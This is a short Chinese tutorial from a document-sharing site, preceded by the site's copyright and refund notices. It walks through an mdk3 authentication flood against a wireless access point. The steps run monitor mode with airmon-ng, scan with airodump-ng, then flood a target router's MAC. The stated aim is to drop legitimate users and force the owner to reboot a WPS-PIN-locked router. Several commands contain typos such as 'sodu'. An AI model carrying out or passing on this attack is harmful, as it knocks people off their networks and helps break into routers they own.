- 1、本文档共9页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
mdk3洪水攻击教程图解
1: 开始菜单—终端模拟器?2: (运行mdk3)sudo mdk3?3: (检测网卡)sudoifconfig -a?4: (模拟端口)soduairmon-ng start wlan0(网卡0就选0,1就选1)?5: (扫描MAC)sudoairodump-ng mon0?6:扫描完后,CTRL+C停止?7:(开始攻击 )? ?sodu mdk3 mon0 a -a MAC(PIN死的MAC)?8:攻击完成后,CTRL+C停止 ,进行下一个。?总结:运行软件 : sudo mdk3检测网卡:sudoifconfig -a模拟端口:sudoairmon-ng start wlan0(网卡是0填0 1填1 下面一样)扫描:sudoairodump-ng mon0 (被pin死的路由器的mac)攻击:sudo mdk3 mon0 a -a mac(被pin死的路由器的mac)原理:此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。注:sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt,reboot,su等等。这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性。sudo不是对shell的一个代替,它是面向每个命令的。教程到此结束,谢谢!
文档评论(0)